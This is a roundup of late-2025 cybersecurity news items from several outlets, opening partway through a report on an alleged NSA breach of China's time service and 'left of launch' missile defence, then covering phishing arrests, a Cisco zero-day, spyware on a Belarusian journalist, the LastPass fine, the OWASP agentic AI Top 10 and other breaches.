The NSA had no comment on the report, but defense analysts say the Chinese report is a significant clue to one of the most secret programs in support of an advanced form of strategic missile defense called “left of launch.”
Left of launch refers to a timeline for using various military tools, such as cyberattacks that could cause missiles to blow up in silos when launch buttons are pushed, special operations commandos and on-the-ground sabotage after a missile is detected being readied for firing.
The project to conduct prelaunch attacks and sabotage of missile systems has been underway for at least a decade, and its elements are among the U.S. military’s most closely guarded secrets.
Asked recently how left of launch will be used in President Trump’s forthcoming Golden Dome defense system to prevent a missile from being fired, Space Force Gen. Michael A. Guetlein, vice chief of space operations, said cryptically: “Can’t talk about it.”
PNT satellite system
Gaining access to China’s central time system would provide a major advantage to the U.S. military and military intelligence services during a conflict by allowing hackers to disrupt missile strikes before launch or shortly after launch, known as the boost phase.
The time center is a key element of China’s BeiDou satellite navigation system, a copy of the U.S. GPS, which uses more than 35 satellites to provide the People’s Liberation Army with vital PNT — positioning, navigation and timing — for its missile systems.
The satellite system is said to provide “centimeter-level” precision and is linked to the National Time Service Center.
Theoretically, NSA cyber sleuths, by breaching the time center, could have planted malicious software inside the PNT data chain that could then be used for intelligence gathering on missile targets and providing false navigation parameters for missile strikes.
U.S. advanced artificial intelligence technology also could fashion prelaunch disruptions that could retarget Chinese missiles against Beijing.
A Chinese state media report on the NSA cyberattacks stated that control over timing is equivalent to “controlling the heartbeat of modern society.”
“Once the timing system is interfered with or hijacked, the consequences are unimaginable,” the online Chinese communications outlet C114 reported. It noted potential disruptions of financial markets, power grids, rail lines and military systems.
For missile systems, PNT is an essential element for real-time location, direction and precise time data used for accurate targeting, trajectory control and command and control.
“There’s no doubt that the best time to defeat a missile is before it’s launched,” said Todd Harrison, a defense expert with the American Enterprise Institute. “The most obvious way is to track and destroy the launchers and the command and control infrastructure and sensors that enable them.”
Conducting the attacks is difficult because of the distances involved and the risks of escalation.
Various non-kinetic tools can be used to defeat a missile “kill chain” before launch, including jamming sensors and communications, and cyberattacks on command and control systems, Mr. Harrison said.
Electronic disruptions before launch can produce uncertain effectiveness during combat, even if they initially produce impacts, because thinking adversaries will adapt and overcome the disruptions.
“The question for Golden Dome is how much relative effort the architecture puts toward left of launch versus other phases of flight,” Mr. Harrison said. “Left of launch will surely be part of the approach, but we still don’t know how much emphasis it will garner.”
Sensors and capabilities
Mr. Trump’s executive order on missile defense, signed in January, specifically calls for developing and deploying left-of-launch capabilities for Golden Dome.
The order states that in addition to deploying defenses targeting missiles in midflight and terminal phases, the new system must “defeat missile attacks prior to launch and in the boost phase.”
Gen. Stephen Whiting, commander of U.S. Space Command, said in September that left-of-launch defenses will provide a next-generation missile defense capability.
Prelaunch defenses are needed because enemy missiles are becoming more precise and more lethal, he said at a defense conference.
“We are seeing both the capacity and the capability of the threat missiles we’re now facing rapidly increase,” Gen. Whiting said at the annual Air, Space & Cyber Conference. “Just look over the last 18 months in the Israel-Iran conflict … multiple salvos of missiles, not single-digit missiles, not double-digit missiles. We’re talking triple-digit missile salvos paired with one-way attack drones.”
Gen. Whiting said current missile defenses are capable of providing warning and tracking of traditional ballistic missiles, but newer high-speed hypersonic maneuvering missiles and space-based hypersonic missiles are “incredibly destabilizing.”
“Our missile defenses have done broadly a good job during the most recent conflicts, but most of those are focused on terminal engagement,” the general said.
“We want to be able to push that engagement to the left, and eventually left of launch,” he said.
To conduct such prelaunch strikes, greater sensor integration is needed, and more sophisticated cyberattacks will be used to “drive capabilities that allow us to affect targets before they even begin to launch,” Gen. Whiting said.
Robert Peters, senior research fellow for strategic deterrence and The Heritage Foundation, said one of the more promising elements of the Golden Dome will be deploying better overhead sensors and coupling them with theater defense sensors. The advanced sensors will enhance homeland missile defenses by providing significantly greater awareness of when enemy missiles are being readied for launch, and then provide more accurate data once a missile is fired.
“This better integration of data and sensors greatly increases a state’s ability to intercept missiles before they hit their targets,” Mr. Peters said.
Launch preparations for solid-fuel missiles in silos, such as China’s new fields of more than 350 intercontinental ballistic missiles in western China, will be more difficult to detect before launch.
Mobile ICBMs moved out of garrison in preparation for launch have signatures that can be tracked more easily as part of left-of-launch defenses, Mr. Peters said.
“Golden Dome, if done properly, will invest heavily in these types of sensor architectures, not simply on more and more modern interceptors, as critical as those are,” Mr. Peters said.
Israel’s military conducted a series of left-of-launch strikes on Iranian missiles before the joint U.S.-Israeli bombing raid on Iran’s key nuclear facilities.
The Israel Defense Forces released videos of airstrikes on several Iranian mobile missiles that were blown up before they could be fired in retaliatory attacks.
Israeli forces also conducted sabotage operations inside Iran. They neutralized some key missile technicians in the days before the June raid on three nuclear facilities, according to an Israeli think tank report.
In addition to better sensors and increased cyberattack capabilities, special operations forces also will be developed for prelaunch strikes on targets.
Left-of-launch options
Lt. Gen. Sean Farrell, deputy commander of U.S. Special Operations Command, said special operations commandos are working on left-of-launch missile defense capabilities for missiles and drones.
“We have been working left of launch on behalf of the [Defense] Department to try to understand how we can get after the threats before they become a threat,” Gen. Farrell said at the conference with Gen. Whiting. “I think a lot of that will translate as well if we’re able to synchronize and plan together at the strategic level on where we can bring left-of-launch attention to a layered approach to homeland defense.”
The ultimate goal of the layered and integrated missile defense is to deploy an array of forces across all military domains that can detect, disrupt and potentially stop missile threats before they emerge.
Left-of-launch capabilities have been a topic within the Pentagon since at least 2014, when a memorandum was disclosed from Chief of Naval Operations Adm. Jonathan Greenert and Army Chief of Staff Gen. Ray Odierno to the secretary of defense warning that missile defense spending was “unsustainable” because of sharp defense cuts.
The two military leaders called for building more cost-effective left-of-launch capabilities.
Defense officials at the time said the research for left of launch included non-kinetic weapons, such as cyberattacks and electronic warfare, including electromagnetic pulse attacks against missile command and control systems.
These weapons would be used after missile launch preparations are detected. They would disrupt or disable launch controls or send malicious commands to cause the missiles to explode on their launchers.
In 2016, Adm. William Gortney, then commander of U.S. Northern Command, stated in prepared congressional testimony that most missile defenses are designed to intercept missiles after launch, using ground-based interceptors, mobile regional defenses and ship-based anti-missile systems.
“We need to augment our defensive posture with one that is designed to defeat ballistic missile threats in the boost phase as well as before they are launched, known as ‘left of launch,’” Adm. Gortney said.
Other potential boost-phase defenses could include high-powered lasers deployed on drones or aircraft that can strike missiles just after launch.
All current missile defense systems use kinetic kill interceptors that require precision targeting data to knock out high-speed warheads. They include Patriot, Terminal High Altitude Area Defense, or THAAD, and large Ground-Based Interceptors in Alaska and California, an Aegis missile defense based mostly on ships and in several ground locations.
The Golden Dome will deploy space-based interceptors for the first time, providing greater coverage against missile threats.
Kenneth Todorov, former deputy director of the Missile Defense Agency and now vice president at Northrop Grumman Missile Defense Solutions, said the company is working on left-of-launch capabilities and counter-hypersonic missile efforts.
“With decades of experience supporting mission-critical defense programs across the entire kill chain, the company is bringing to bear a portfolio of advanced, innovative capabilities from left of launch, through detection and tracking, all the way to assessment of kill, delivering mission agility in addressing the evolving hypersonic threat,” Mr. Todorov said on the Northrop website.
Patrycja Bazylczyk, associate director of the Missile Defense Project at the Center for Strategic and International Studies, said left-of-launch defenses include a broad category of kinetic and non-kinetic efforts to counter enemy launches. They can include strikes on missile launchers, jamming enemy communications or infiltrating a missile factory.
“Left-of-launch efforts are not alternatives to active missile defenses; they work in tandem, allowing U.S. forces to more effectively counter enemy action rather than merely respond to it,” Ms. Bazylczyk said.
bleepingcomputer.com
By Bill Toulas
December 19, 2025
The Nigerian police have arrested three individuals linked to targeted Microsoft 365 cyberattacks via Raccoon0365 phishing-as-a-service.
The attacks led to business email compromise, data breaches, and financial losses affecting organizations worldwide.
The law enforcement operation was possible thanks to intelligence from Microsoft, shared with the Nigeria Police Force National Cybercrime Centre (NPF–NCCC) via the FBI.
The authorities identified individuals who administered the phishing toolkit ‘Raccoon0365,’ which automated the creation of fake Microsoft login pages for credential theft.
The service, which was responsible for at least 5,000 Microsoft 365 account compromises across 94 countries, was disrupted by Microsoft and Cloudflare last September.
It is unclear if the disruption operation helped identify those behind Raccoon0365 in Nigeria.
BleepingComputer contacted Microsoft for clarifications but a comment wasn't immediately available.
“Acting on precise and actionable intelligence, NPF–NCCC operatives were deployed to Lagos and Edo States, leading to the arrest of three suspects,” reads the police’s announcement.
“Search operations conducted at their residences resulted in the recovery of laptops, mobile devices, and other digital equipment, which have been linked to the fraudulent scheme after forensic analysis.”
One of the arrested suspects is an individual named Okitipi Samuel, also known online as “RaccoonO365” and “Moses Felix,” whom the police believe is the developer of the phishing platform.
Samuel operated a Telegram channel where he sold phishing kits to other cybercriminals in exchange for cryptocurrency, while he also hosted the phishing pages on Cloudflare using accounts registered with compromised credentials.
The Telegram channel counted over 800 members around the time of the disruption, and the reported access fees ranged from $355/month to $999/3 months.
Cloudflare estimates that the service is used primarily by Russia-based cybercriminals.
Regarding the other two arrested individuals, the police stated they have no evidence linking them to the Raccoon0365 operation or creation.
The person that Microsoft previously identified as the leader of the phishing service, Joshua Ogundipe, is not mentioned in the police’s announcement.
techcrunch.com
Lorenzo Franceschi-Bicchierai
12:15 PM PST · December 19, 2025
On Wednesday, Cisco revealed that a group of Chinese government-backed hackers is exploiting a vulnerability to target its enterprise customers who use some of the company’s most popular products.
Cisco has not said how many of its customers have already been hacked, or may be running vulnerable systems. Now, security researchers say there are hundreds of Cisco customers who could potentially be hacked.
Piotr Kijewski, the chief executive of the nonprofit Shadowserver Foundation that scans and monitors the internet for hacking campaigns, told TechCrunch that the scale of exposure “seems more in the hundreds rather than thousands or tens of thousands.”
Kijewski said the foundation was not seeing widespread activity, presumably because “current attacks are targeted.”
Shadowserver has a page where it’s tracking the number of systems that are exposed and vulnerable to the flaw disclosed by Cisco, named officially as CVE-2025-20393. The vulnerability is known as a zero-day, because the flaw was discovered before the company had time to make patches available. As of press time, India, Thailand, and the United States collectively have dozens of affected systems within their borders.
Censys, a cybersecurity firm that monitors hacking activities across the internet, is also seeing a limited number of affected Cisco customers. According to a blog post, Censys has observed 220 internet-exposed Cisco email gateways, one of the products known to be vulnerable.
In its security advisory published earlier this week, Cisco said that the vulnerability is present in software found in several products, including its Secure Email Gateway and its Secure Email and Web Manager.
Cisco said these systems are only vulnerable if they are reachable from the internet, and have its “spam quarantine” feature enabled. Neither of those two conditions are enabled by default, per Cisco, which would explain why there appears to be, relatively speaking, not that many vulnerable systems on the internet.
Cisco did not respond to a request for comment, asking if the company could corroborate the numbers seen by Shadowserver and Censys.
The bigger problem with this hacking campaign is that there are no patches available. Cisco recommends that customers wipe and “restore an affected appliance to a secure state,” as a way to remediate any breach.
“In case of confirmed compromise, rebuilding the appliances is, currently, the only viable option to eradicate the threat actors persistence mechanism from the appliance,” the company wrote in its advisory.
According to Cisco’s threat intelligence arm Talos, the hacking campaign has been ongoing since “at least late November 2025.”
bbc.com
Sam Francis
Political reporter
19.12.2025
The trade minister says information was accessed and an investigation has been launched.
Government data has been stolen in a hack though officials believe the risk to individuals is "low", a minister has said.
Trade Minister Chris Bryant told BBC Breakfast "an investigation is ongoing" into the hack, adding that the security gap was "closed pretty quickly".
A Chinese affiliated group is suspected of being behind the attack, but Bryant said investigators "simply don't know as yet" who is responsible.
That data is understood to have been on systems operated on the Home Office's behalf by the Foreign Office, whose staff detected the incident.
"We think that it's a fairly low-risk that individuals will have been compromised or affected," Bryant said.
It comes after the Sun newspaper reported that hackers affiliated to the Chinese state accessed the data in October with information possibly including visa details targeted.
The incident has been referred to the Information Commissioners Office.
UK intelligence agencies have warned about increasing, large-scale espionage from China, using cyber and other means, and targeting commercial and political information.
The cyber-agency GCHQ said last year that it was devoting more resources to counter threats from China than any other nation.
"Government facilities are always going to be potentially targeted," Bryant said on Friday.
"We are working through the consequences of what this is."
"This is a part of modern life that we have to tackle and deal with," Bryant added, pointing to major hacks in recent years at Jaguar Land Rover, Marks & Spencer and the British Library.
Confirmation of a hack by a Chinese state group would be awkward for the government ahead of a planned visit to Beijing next year by Sir Keir Starmer, the first by a UK prime minister since 2018.
The Labour government has said it is important to engage with China as it cannot be ignored on trade, climate change and other major issues, but face-to-face meetings also provide a forum for robust exchanges about issues affecting UK security.
The Chinese government has consistently denied it backs cyber-attacks targeting the UK.
Last year, responding to the UK government's National Security Strategy, a spokesperson for the Chinese embassy in London said "accusations such as Chinese espionage, cyber-attacks, and transnational repression against the UK are entirely fabricated, malicious slander".
Earlier this month, Sir Keir said UK government policy towards China could not continue to blow "hot and cold".
Failing to navigate a relationship with China, he said, would be a "dereliction of duty" when China is a "defining force in technology, trade and global governance".
Building a careful relationship would instead bolster the UK's place as a leader on the international stage and help secure UK national interests, Sir Keir said, while still recognising the "reality" that China "poses national security threats".
| Commsrisk
By
Eric Priezkalns
15 Dec 2025
Serbia’s Ministry of Internal Affairs has issued a statement and photographs relating to the arrest of two Chinese nationals who sent smishing SMS messages from a fake base station. The messages included links to websites which impersonated reputable public and private sector organizations including mobile operators. The websites asked for the details of the payment cards belonging to victims. The information obtained from victims was then used to purchase goods and services abroad.
This appears to be the first reported case of its type in Serbia. Nothing was said about the location in Serbia where the men were caught but the police reportedly searched multiple apartments and business premises. The two arrested men, aged 33 and 34, were said to be working for an organized criminal gang that operates across ‘several’ European countries.
Regular readers of Commsrisk may also notice a telltale sign that these criminals are connected to SMS blasting smishers found elsewhere. Photographs of the equipment found in their car show they possessed a distinctive orange DC-AC power converter of a type also used in conjunction with SMS blasters seized in many other countries. Scroll down for the photographs of the equipment found in Serbia.
Commsrisk uses AI-powered search to maintain the most comprehensive global map of reported SMS blasters. This incident has been added to the map.
Photographs from the Serbian government of the seized equipment are reproduced below. A video of the two men being arrested is here. Look here for this news per the official Instagram account of the Serbian Ministry of Internal Affairs.
therecord.media
Forensic researchers at Reporters Without Borders (RSF) have found a previously unknown spyware tool on a Belarusian journalist’s phone, the nonprofit said Wednesday.
The organization said it believes the spyware has been in use since at least 2021 based on its analysis comparing samples on an antivirus platform. Dubbed ResidentBat, the spyware can access call logs, SMS and encrypted app messages, microphone recordings, locally stored files and screen captures. It is used to target Android phones.
The journalist and RSF believe the spyware was installed while the journalist was detained by the Belarusian KGB. The phone was seized during questioning and authorities at one point forced the journalist to unlock the phone, RSF said in a press release.
Similar examples of authoritarian regimes installing spyware on journalists' phones while they are being questioned by police or security services have occurred recently in Serbia and Kenya.
“Growing list of cases where authoritarian regimes use detention to implant spyware on phones,” John Scott-Railton, a digital forensic researcher at Citizen Lab, said in a social media post. “Important investigation and reminder that dictators don't always need zero-days.”
In December 2024, Citizen Lab reported it had found spyware secretly placed on a phone belonging to a Russian programmer accused of supporting Ukraine after he was released from custody by Russian authorities.
The recent infection targeting the Belarusian journalist came to light after antivirus software on their phone flagged “suspicious components” a few days after their detention. The journalist contacted the Eastern European nonprofit RESIDENT.NGO, which analyzed the phone with RSF.
“By deploying surveillance technologies such as ResidentBat, the Belarusian state is pursuing a deliberate strategy of repression against independent journalism,” Antoine Bernard, RSF’s director of advocacy and assistance, said in a statement. “The systematic invasion of their private and professional lives amounts to a direct and unlawful assault on press freedom and fundamental rights.”
Belarus ranks 166th out of 180 countries and territories on a press freedom survey conducted by the organization.
RSF said it has made Google aware of its findings, and the tech giant plans to send a threat notification to all Google users identified as targets of the spyware campaign.
| TechCrunch techcrunch.com
Lorenzo Franceschi-Bicchierai
7:37 AM PST · December 12, 2025
Hama Film makes photo booths that upload pictures and videos online. But their back-end systems have a simple flaw that allows anyone to download customer pictures.
A company that makes photo booths is exposing pictures and videos of its customers online thanks to a simple flaw in its website where the files are stored, according to a security researcher.
The researcher, who goes by Zeacer, alerted TechCrunch to the security issue in late November after reporting the vulnerability in October to Hama Film, the photo booth maker that has franchise presence in Australia, the United Arab Emirates, and the United States, but did not hear back.
Zeacer shared with TechCrunch a sample of pictures taken from Hama Film’s servers, which showed groups of clearly young people posing in photo booths. Hama Film’s booths not only print out the photos like a typical photo booth, but booths also upload the customers’ photos to the company’s servers.
Vibecast, which owns Hama Film, has yet to respond to his messages alerting the company of the issues. Vibecast also hasn’t responded to several requests for comment from TechCrunch, nor did Vibecast’s co-founder Joel Park respond to a message we sent via LinkedIn.
As of Friday, the researcher said the company has still not fully resolved the security flaw and continues to expose customers’ data. As such, TechCrunch is withholding specific details of the vulnerability from publication.
When Zeacer first found this flaw, he noted that it appeared that photos were deleted from the photo booth maker’s servers every two to three weeks.
Now, he said, the pictures stored on the servers appear to get deleted after 24 hours, which limits the number of pictures exposed at any given time. But a hacker could still exploit the vulnerability he discovered each day and download the contents of every photo and video on the server.
Before this week, Zeacer said at one point he saw more than 1,000 pictures online for the Hama Film booths in Melbourne.
This incident is the latest example of a company that, at least for a time, was not implementing certain basic and widely accepted security practices, such as rate-limiting. Last month, TechCrunch reported that government contractor giant Tyler Technologies was not rate-limiting its websites used for allowing courts to manage their jurors’ personal information. This meant anyone could break into any juror’s profile by running a computer script capable of mass-guessing their date of birth and their easy-to-guess numerical identifier.
News provided by
OWASP
Dec 10, 2025, 03:03 ET
WILMINGTON, Del., Dec. 10, 2025 /PRNewswire/ -- The OWASP GenAI Security Project (genai.owasp.org), a leading global open-source and expert community dedicated to delivering practical guidance and tools for securing generative and agentic AI, today released the OWASP Top 10 for Agentic Applications, a key resource to help organizations identify and mitigate the unique risks posed by autonomous AI agents.
Following more than a year of research, review and refinement, this Top 10 list reflects a culmination of input from over 100 security researchers, industry practitioners, user organizations and leading cybersecurity and generative AI technology providers. The result is not only a list of risks and mitigations, but a suite of resources designed for practitioners providing data-driven guidance.
The framework was further evaluated by the GenAI Security Project's Agentic Security Initiative Expert Review Board, which includes representatives from recognized bodies around the world such as NIST, European Commission and the Alan Turing Institute, among others. A full list of contributing organizations can be found here.
"This new OWASP Top 10 reflects incredible collaboration between AI security leaders and practitioners across the industry," said Scott Clinton, the OWASP GenAI Security Project's Co-Chair, Board Member, and Co-Founder. "As AI adoption accelerates faster than ever, security best practices must keep pace. The community's responsiveness has been remarkable, and this Top 10, along with our broader open-source resources, ensures organizations are better equipped to adopt this technology safely and securely."
Agent Behavior Hijacking, Tool Misuse and Exploitation and Identity and Privilege Abuse are some of the highlighted threats within the Top 10 and they showcase how attackers can subvert agent capabilities or their supporting infrastructure. Incidents involving these agentic systems are increasingly capable across industries, elevating the need for these new resources.
"Companies are already exposed to Agentic AI attacks - often without realizing that agents are running in their environments," said Keren Katz, Co-Lead for OWASP's Top 10 for Agentic AI Applications and Senior Group Manager of AI Security at Tenable. "While the threat is already here, the information available about this new attack vector is overwhelming. Effectively protecting a company against Agentic AI requires not only strong security intuition but also a deep understanding of how AI agents fundamentally operate."
"Agentic AI introduces a fundamentally new threshold of security challenges, and we are already seeing real incidents emerge across industry," said John Sotiropoulos, GenAI Security Project Board member, Agentic Security Initiative and Top 10 for Agentic Applications Co-lead, and Head of AI Security at Kainose. "Our response must match the pace of innovation, which is why this Top 10 focuses on practical, actionable guidance grounded in real-world attacks and mitigations. This release marks a pivotal moment in securing the next generation of autonomous AI systems."
The Top 10 for Agentic Applications joins a growing portfolio peer-reviewed resources released by the OWASP GenAI Security Project and its Agentic Security Initiative, including:
The State of Agentic Security and Governance 1.0: A practical guide to the governance and regulations for the safe and responsible deployment of autonomous AI systems.
The Agentic Security Solutions Landscape: A quarterly, peer-reviewed map of open-source and commercial agentic AI tools and how they support SecOps and mitigate DevOps–SecOps risks.
A Practical Guide to Securing Agentic Applications: Practical technical guidance for securely designing and deploying LLM-powered agentic applications.
Reference Application for Agentic Security: An OWASP FinBot Capture The Flag applications , designed to test and practice agentic security skills in a controlled environment.
Agentic AI Threats and Mitigations: This document is the first in a series to provide a threat-model-based reference of emerging agentic threats and discuss mitigations.
And more
"Over the past two and a half years, the OWASP Top 10 for LLM Applications has shaped much of the industry's thinking on AI security," said, Steve Wilson, OWASP GenAI Security Project Board Co-Chair, Founder of OWASP Top 10 for LLM, and CPO of Exabeam, Inc. "This year, we've seen agentic systems move from experiments to real deployments, and that shift brings a different class of threats into clear view. Our team met that challenge by expanding our guidance to address how agentic systems behave, interact, and make decisions. The LLM Top 10 will remain a core, regularly updated resource, and aligning both efforts is key to helping the community build safer, more reliable intelligent systems.
Discover what industry experts, researchers and leading global organizations have to say about the new Top 10 for Agentic Applications here.
The OWASP GenAI Security Project invites organizations, researchers, policymakers and practitioners to access the new Top 10 for Agentic Applications, contribute to future updates and join the global effort to build secure, trustworthy AI systems. Visit our site to learn more and how you can contribute.
About OWASP Gen AI Security Project
The OWASP Gen AI Security Project (genai.owasp.org) is a global, open-source initiative and expert community dedicated to identifying, mitigating, and documenting security and safety risks associated with generative AI technologies, including large language models (LLMs), agentic AI systems, and AI-driven applications. Our mission is to empower organizations, security professionals, AI practitioners, and policymakers with comprehensive, actionable guidance and tools to ensure the secure development, deployment, and governance of generative AI systems. Visit our site to learn more.
From:
Foreign, Commonwealth & Development Office gov.uk
Published
9 December 2025
Two tech companies based in China have been sanctioned for reckless and indiscriminate cyberattacks
Sichuan Anxun Information Technology Co. Ltd (known as i-Soon) for targeting over 80 government and private industry IT systems across the world, and for supporting others planning to carry out malicious cyber activity.
Integrity Technology Group Incorporated (known as Integrity Tech) for controlling and managing a covert cyber network and providing technical assistance for others to carry out cyberattacks. Targets have included UK public sector IT systems.
I-Soon and Integrity Tech are examples of the threat posed by the cyber industry in China, which includes information security companies, data brokers (that collect and sell personal data), and ‘hackers for hire’. Some of these companies provide cyber services to the Chinese intelligence services.
The UK’s National Cyber Security Centre (NCSC) assesses that it is almost certain that this ‘ecosystem’ or complex network of private sector actors, supports Chinese state-linked cyber operations.
The announcement follows the August 2025 exposure by the UK and international partners of three China-based companies linked to the cyber-espionage campaign known as SALT TYPHOON. Combined, they highlight the vast scale of cyberattacks by China-based companies targeting governments, telecommunications, military institutions, and public services worldwide.
These cyberattacks from unrestrained actors in China go against agreed UN cyber principles. The measures announced today are designed to reduce the risk of such threats to the UK’s security and broader international stability.
As the Prime Minister set out recently in a speech at the Guildhall, protecting our security is non-negotiable and the first duty of the government. The UK recognises that China poses a series of threats to UK national security. China is also a fellow permanent member of the UN Security Council, the world’s second largest economy and a nuclear power which has delivered almost a third of global economic growth over the past decade. We challenge threats robustly, enabling us to pursue cooperation where it is in our interest.
Notes to Editors
In August 2025, the UK alongside 12 other countries co-sealed a cyber security advisory linking China-based technology companies to some of the activities associated with a China state-affiliated APT group (commonly known as SALT TYPHOON). These companies are: Sichuan Juxinhe Network Technology Co. Ltd, Beijing Huanyu Tianqiong Information Technology Co., and Sichuan Zhixin Ruije Network Technology Co. Ltd.
This activity targeted governments, telecommunications, transportation, and military infrastructure globally, and sought to provide Chinese intelligence services with the capability to identify and track targets’ communications and movements worldwide.
Together with France, the UK continues to lead the Pall Mall Process, an international initiative which seeks to establish a framework for responsible behaviour for those involved in the rapidly growing market in commercial cyber intrusion capabilities.
The UK has consistently promoted the UN normative framework for responsible state behaviour in cyberspace. The UK remains the first and only country to publish guidelines for its National Cyber Force detailing the principles that we adhere to. We firmly believe that states should use cyber capabilities in a responsible manner, whether commercial or otherwise.
breakingnews.ie
Darragh Mc Donagh
It has now emerged that a second ransomware attack took place last February
There is no evidence that patients’ data was stolen during a second ransomware attack targeting Health Service Executive (HSE) systems earlier this year, the authority has said.
Earlier this week, the HSE began offering compensation to victims of a cyberattack that caused widespread disruption in May 2021, costing the agency an estimated €102 million.
It has now emerged that a second ransomware attack took place last February, targeting a third-party processor and resulting in a data protection breach reported by HSE primary care services in the midlands.
IT systems were fully recovered following the cyberattack and there was no evidence that data had been exfiltrated, according to HSE records obtained under the Freedom of Information Act.
A ransomware attack occurs when malicious software locks or encrypts a victim’s computer systems, blocking access until a ransom is paid. Some attacks involve a threat to leak stolen data.
A spokeswoman for the HSE did not respond when asked whether the health authority had paid a ransom following the February cyberattack.
“The HSE manages and responds to thousands of cyber threats annually, taking appropriate action to ensure awareness of current threats, while maintaining the ability to deliver healthcare services securely and reliably, regardless of the evolving threat landscape,” she said.
The spokeswoman said HSE systems were not “directly” impacted by the February ransomware attack.
“The HSE has invested significantly in cyber remediation since the cyberattack in May 2021. Multiple ongoing programmes of work are focused on addressing all issues highlighted in the wake of the attack,” she added.
The original ransomware attack occurred when an employee clicked on a malicious MS Excel file that was attached to a phishing email on March 18th, 2021.
This enabled the hackers to gain access to the HSE’s IT environment, where they continued to operate undetected for more than eight weeks before detonating the ransomware on May 14th.
The attack caused widespread disruption and some information relating to patients was illegally accessed and copied.
Last year, the HSE said it had written to 90,936 people affected by the cyberattack. It has reportedly offered compensation of €750 to more than 600 individuals who took legal action over the breach.
A subsequent investigation found that the HSE was operating a frail IT system and did not have adequate cyber expertise or resources prior to the attack. The attack is estimated to have cost the HSE €102 million.
ico.org.uk | The Information Commissioner’s Office (ICO)
Date 11 December 2025
The Information Commissioner’s Office (ICO) has fined password manager provider LastPass UK Ltd £1.2 million following a 2022 data breach that compromised the personal information of up to 1.6 million of its UK users.
Service which promises to help people improve their security, has failed them, leaving them vulnerable
Combination of two isolated incidents enabled hacker to steal personal information relating to 1.6m customer
‘Zero knowledge’ encryption system ensures customer passwords and vaults are not decrypted
We have fined password manager provider LastPass UK Ltd £1.2 million following a 2022 data breach that compromised the personal information of up to 1.6 million of its UK users.
We found that LastPass failed to implement sufficiently robust technical and security measures, which ultimately enabled a hacker to gain unauthorised access to its backup database. There is no evidence that hackers were able to unencrypt customer passwords as these are stored locally on customer devices and not by LastPass.
The incidents occurred in August 2022 when a hacker gained access first to a corporate laptop of an employee based in Europe and then to a US-based employee’s personal laptop on which the hacker implanted malware and then was able to capture the employee’s master password. The combined detail from both incidents enabled the hacker to access LastPass’ backup database and take personal information which included customer names, emails, phone numbers, and stored website URLs.
John Edwards, UK Information Commissioner, said:
“Password managers are a safe and effective tool for businesses and the public to manage their numerous login details and we continue to encourage their use. However, as is clear from this incident, businesses offering these services should ensure that system access and use is restricted to ensure risks of attack are significantly reduced.
“LastPass customers had a right to expect the personal information they entrusted to the company would be kept safe and secure. However, the company fell short of this expectation, resulting in the proportionate fine being announced today.
“I call on all UK business to take note of the outcome of this investigation and urgently review their own systems and procedures to make sure, as best as possible, that they are not leaving their customers and themselves exposed to similar risks”.
Details of the two incidents
Incident one
A hacker compromised a LastPass employee’s corporate laptop and gained access to the company’s development environment.
No personal information was taken however encrypted company credentials were. If decrypted, this would allow access to the company’s backup database.
LastPass took steps to mitigate the hacker’s activity and believed encryption keys remained safe as they were stored outside of the area accessed by the hacker in the account vaults of four senior employees.
Incident two
The hacker then targeted one of the senior employees who had access to the decryption keys, gaining access to their personal device via a known vulnerability in a third-party streaming service.
A keylogger was installed capturing the employee’s master password and multi factor authentication was bypassed using a trusted device cookie.
The hacker then gained access to the employee’s personal and business LastPass vaults, which were linked using a single master password.
The hacker then gained access to the employee’s business vault which contained the Amazon Web Service (AWS) access key and decryption key.
This information, combined with information taken the day before, enabled the hacker to extract the contents of the backup database which contained the personal information.
Our investigation found no evidence that encrypted passwords and other credentials were able to be unencrypted by the hacker. This is due to LastPass’ use of a ‘zero knowledge’ encryption system, whereby the master password required to access a password vault is stored locally on a customer’s own device and never shared with LastPass.
Advice and guidance
We urge organisations to ensure internal security policies explicitly consider and address data breach risks. Where risks are identified access should be restricted to specific user groups.
Businesses wishing to review their procedures should turn to our and the National Cyber Security Centre websites which provide a rich source of information detailing ways to improve practices including Working from home – security checklist for employers, Data security guidance and Device security guidance.
Kyiv • UNN - unn.ua | УНН
December 6 2025
On December 6, the HUR MOD Cyber Corps and BO Team attacked the Russian logistics company "Eltrans+". Over 700 computers and servers were deactivated, 165 terabytes of data were destroyed, and network equipment was disabled.
The GUR Cyber Corps attacked Russia's leading logistics company on the night of December 6 - more than 700 computers and servers were deactivated, 165 terabytes of critical data were destroyed or encrypted, UNN reports with reference to sources.
On the night of December 6, specialists from the Main Intelligence Directorate of the Ministry of Defense, together with the BO Team, launched a cyberattack on the information and communication infrastructure of the Eltrans + group of companies. As a result of the attack, more than 700 computers and servers were deactivated, more than a thousand company users were deleted, and 165 terabytes of critical data were destroyed or encrypted.
ccording to the UNN interlocutor, in addition, the access control system, video surveillance data storage and backup system were affected, network equipment along with the core of the data center was deactivated and disabled, declarations for all cargo were destroyed, and all company websites were "defaced", which now greet Russian users with the Day of the Armed Forces of Ukraine.
Let's add
"Eltrans+" is among the top 10 largest customs representatives and freight forwarders in Russia. More than 5,000 Russian small, medium and large businesses use the services of "Eltrans+".
The company carries out international and domestic transportation (road, sea, air, multimodal), warehouse storage, transportation of consolidated cargo, as well as full customs clearance of goods.
"Eltrans+" is engaged in the delivery of sanctioned goods, as well as various electronic components from China, which are used by the Russian military-industrial complex, the UNN interlocutor reported.
koreajoongangdaily.joins.com
BY LEE YOUNG-KEUN, KIM JI-HYE
The former Coupang employee accused of leaking 33.7 million customer data had worked at the company for just two years, according to police on Thursday.
According to the Seoul Metropolitan Police Agency and sources familiar with the case who spoke to the JoongAng Ilbo, the suspect in the data breach — identified as a 43-year-old developer and Chinese national — was affiliated with Coupang's Seoul office. The person joined Coupang in November 2022 and was assigned to work on a key management security system before leaving the company late last year.
It’s difficult to understand from a common sense perspective why a newly hired developer with foreign nationality would be given access to sensitive customer information — especially in today’s security-conscious corporate environment,” said an industry source. “Given that such duties typically require strict security training and pledges, it raises questions about whether the company’s protocols were adequate.”
Coupang disclosed on Nov. 29 that approximately 37.7 million customer accounts had been exposed. The compromised data includes names, email addresses, saved delivery addresses, partial order histories and, in some cases, access codes for shared building entrances.
Due to the massive scale of the breach, police have been raiding Coupang’s headquarters in Songpa District, southern Seoul, for three consecutive days since Tuesday. Thursday's raid began around 9:40 a.m. Investigators are focused on securing records that can explain how the suspect allegedly gained access to Coupang’s security system and extracted the data. These include internal documents, work logs and system records related to the key management platform the suspect worked on during the employment period.
Police are also analyzing logs stored in the company’s security system, such as IP addresses, user credentials and access histories.
